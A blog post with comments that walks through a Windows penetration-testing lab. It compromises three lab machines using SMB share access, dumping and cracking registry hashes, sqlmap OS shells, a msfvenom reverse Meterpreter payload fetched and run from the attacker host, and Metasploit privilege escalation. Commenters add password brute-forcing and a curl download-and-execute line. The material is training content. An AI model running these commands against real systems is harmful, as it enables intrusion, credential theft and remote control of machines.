Blog Post

The Human Connection Blog
5 MIN READ

The Human Connection Challenge Lab 5: Windows Official Walkthrough Guide

StefanApostol's avatar
StefanApostol
Icon for Immerser rankImmerser
2 months ago

Time’s Up! Congratulations to everyone who completed Lab 5: Windows from the Human Connection Challenge: Season 1.

In this walkthrough, I'll share some strategies for efficiently completing the lab based on my perspective as the author. Remember, there are often multiple ways to approach a challenge, so if you used a different method and succeeded, that's perfectly fine!

This challenge has now ended, but the lab remains available for practice. While prizes are no longer up for grabs, you can still complete the lab and use this walkthrough guide for support if needed.

Throughout this walkthrough, placeholders will be used for target IPs in brackets, such as <Kali IP> or <Target IP>. Simply replace this with the actual IP of your Kali instance or the specific target.

With all that considered, let's get started.

Overview

This challenge isn’t linear, meaning you can start with any of the targets listed in the Machines panel. This walkthrough will attack them in order, but it’s up to you which one you try first!

For privilege escalation techniques, I won’t go through each enumeration step (to keep this walkthrough from being 70 pages long!), I’ll simply talk through the technique that helped escalate privileges.

Target 1

As always, when you don’t know anything about a target machine, you Nmap first.

nmap -Pn -sVTC -p- <Target 1 IP>

Here’s a breakdown of the flags used in this command:

  • -Pn: Skip ping scanning
  • -sVTC: Service (V)ersioning, (T)CP scanning, Default S(C)ripts
  • -p-: All ports (1-65535)

Nmap reports that it got a 401 Unauthorized when doing an HTTP GET on port 80 but didn’t get the WWW-Authenticate header. This is not something you generally see because these two usually go hand in hand. Visiting the page confirms the 401 Unauthorized.

However, checking the source code reveals the credentials IMLUser:hidd3n.

These credentials won’t work for remote desktop protocol (RDP), but they will give you access to server message block (SMB).

They’ll also give you access to C. C$ is a hidden share that requires administrator access, but C is a normal share and can be accessed by this user.

Listing the Windows directory, the to-backup folder stands out, as it’s the only non-default folder.

Browsing it reveals backups of SAM, SYSTEM, and SECURITY hives.

These can be transferred offline and reconstructed to obtain local user hashes.

get SAM.backup get SECURITY.backup get SYSTEM.backup
impacket-secretsdump -sam SAM.backup -security SECURITY.backup -system SYSTEM.backup

You can now either pass the hash and log in as administrator, or try to crack it. Both are valid methods, but this is the way to crack it:

echo <Administrator Line> > hash john hash --wordlist=/usr/share/wordlists/rockyou.txt --format=NT

And you’ll get the credentials Administrator:blink182.

Now you can log in over RDP and get your first token!

xfreerdp /v:<Target 1 IP> /u:Administrator /dynamic-resolution +clipboard

Target 2

Initial access

Nmapping the second target reveals a website titled “Password Manager”.

nmap -Pn -sVTC -p- <Target 2 IP>

Upon visiting the website, you’ll see its URL is 10.102.38.73. It asks the user to choose a game from a drop-down box and submit their choice.

Once a game is selected (such as World of Warcraft), it adds a parameter to the URL, which then becomes http://10.102.38.73/?game=WOW.

You can scan this with SQLMap using the following command:

sqlmap -u http://<Target 2 IP>/?game=*

This will confirm that the target is vulnerable to SQL injection, so you can use the following command to gain code execution on the target host:

sqlmap -u http://<Target 2 IP>/?game=* --os-shell

With the ability to execute commands on the target system, you can now read the token.

Privilege escalation

Since the previous shell is limited, you can upload and execute a reverse Meterpreter shell to use all its privilege escalation functions. First, create the Meterpreter shell and serve it over HTTP using Python.

msfvenom -p windows/x64/meterpreter/reverse_tcp lhost=<Kali IP> lport=443 -f exe > shell.exe sudo python -m http.server 80

In a different terminal, run your Metasploit listener.

sudo msfconsole use multi/handler set payload windows/x64/meterpreter/reverse_tcp set lhost <Kali IP> set lport 443 exploit

Finally, in your SQLMap’s OS shell, run the following commands to download and trigger your payload:

powershell wget http://<Kali IP>/shell.exe -o C:\users\iis-admin\shell.exe C:\users\iis-admin\shell.exe

Once you hit enter a second time you’ll get a connection back to your listener.

Metasploit has a variety of post-exploitation modules you can try, but the one that will work is exploit/windows/local/service_permissions.

Of course, you can do this with PowerUp or any other privilege escalation tool of your choice, but Metasploit just automates the exploitation process better in this case.

use exploit/windows/local/service_permissions
set session 1
exploit

The module will first enumerate all local service permissions. Once it finds one that runs under a higher privilege user and it can modify, it automatically exploits this service and starts a new metasploit session under this new user. You’ll then find the token on the desktop.

Target 3

Initial access

Nmapping the second target reveals only two running services, SMB and RDP.

nmap -Pn -sVTC -p- <Target 3 IP>

Enumerating the SMB service reveals that guest access is enabled. The listing also shows a share called Shared.

smbclient -L \\\\<Target 3 IP> -U guest
smbclient \\\\<Target 3 IP>\\Shared -U guest

You should soon reach the file reply.txt, which contains the password for the user IMLUser.

With your newly found credentials (IMLUser:Shar3dPass), you can now RDP into the target.

xfreerdp /v:<Target 3 IP> /u:IMLUser /p:Shar3dPass /dynamic-resolution

You’ll find the first token in a file on the Desktop.

Privilege escalation

This privilege escalation technique is a rather classic one.

After local file enumeration, you can find the Administrator password in C:\Windows\Panther\Unattend.xml and use it to run CMD as administrator and find the final token.

Tools

For this challenge, you’ll use a range of tools including:

  • Nmap
  • Metasploit
  • Python
  • SQLMap 
  • smbclient

Tips

When testing for web application vulnerabilities, remember that vulnerabilities may reside in any part of the application. Subtle elements that appear unimportant could prove exploitable if they neglect to handle inputs securely. So make sure you check all user input forms and any buttons or links that direct you to different parts of the application.

To learn more about some of the tools used in this lab, take a look at the following collections:

  • Windows Basics
  • Privilege Escalation: Windows
  • Introduction to Metasploit
  • SQL Injection

Conclusion

The steps I’ve laid out here aren’t the only way to find the answers to the questions. As long as you find the answers, you did it – well done!

If you used an alternative method, or think there’s a better route to find some of the answers, let us and the rest of the community know in the comments below!

I hope you enjoyed the challenge and are looking forward to the next one, after which I’ll share another walkthrough guide!

Updated 2 months ago
Version 3.0
community challenge
StefanApostol's avatar
Icon for Immerser rankImmerser
Joined February 18, 2025
View Profile
The Human Connection Blog
Learn from our passionate experts on a wide range of subjects from Cyber Threat Research to maximizing value with Immersive, plus, hear from our outstanding customers who are keen to share their experiences.

4 Comments

Sort By
  • steven's avatar
    steven
    Icon for Silver I rankSilver I
    31 days ago

    For target 1 there was an much easier way:
    just bruteforce the password of the administrator and login as administrator. 

    ┌──(kali㉿iml-kali)-[~/Desktop]
└─$ nxc smb 10.102.139.31  -u administrator -p /usr/share/wordlists/rockyou.txt 
SMB         10.102.139.31   445    IML-WIN1018      [*] Windows 10 / Server 2016 Build 17134 x64 (name:IML-WIN1018) (domain:IML-Win1018) (signing:False) (SMBv1:False)
...
SMB         10.102.139.31   445    IML-WIN1018      [+] IML-Win1018\administrator:blink182

    then RDP to the box:

    xfreerdp /v:10.102.139.31 /u:administrator /p:blink182  /dynamic-resolution /cert-ignore +clipboard +drives /drive:root,/home/kali

    so, there's no need to use the IMLuser. But I admit, that would generate a lot of noise :)

    for target 2 in the os-shell of sqlmap you can also use curl to transfer the files:

    > curl http://10.102.12.205:8000/shell.exe -o c:\users\iis-admin\shell.exe
> c:\users\iis-admin\shell.exe

    and I've used the exploit-suggester and the module exploit/windows/local/ms16_075_reflection_juicy to successfully escalate my privileges.

    same for target 3:

    create a file with msfvenom and transfer it to the target. and let the exploit-suggester running to just find out that exploit/windows/local/cve_2020_0787_bits_arbitrary_file_move works :)

    • StefanApostol's avatar
      StefanApostol
      Icon for Immerser rankImmerser
      31 days ago

      nice one steven . For the bruteforce, just remember that our rockyou.txt has been truncated to save space. this would not be feasible in real life, but good hack. As for the others, love the usage of Metasploit modules to escalate. Well done!

      • steven's avatar
        steven
        Icon for Silver I rankSilver I
        31 days ago

        sure, in real life I would not use rockyou but the large password files :)
        it's easy to process is in the background while you're looking manually for other ways.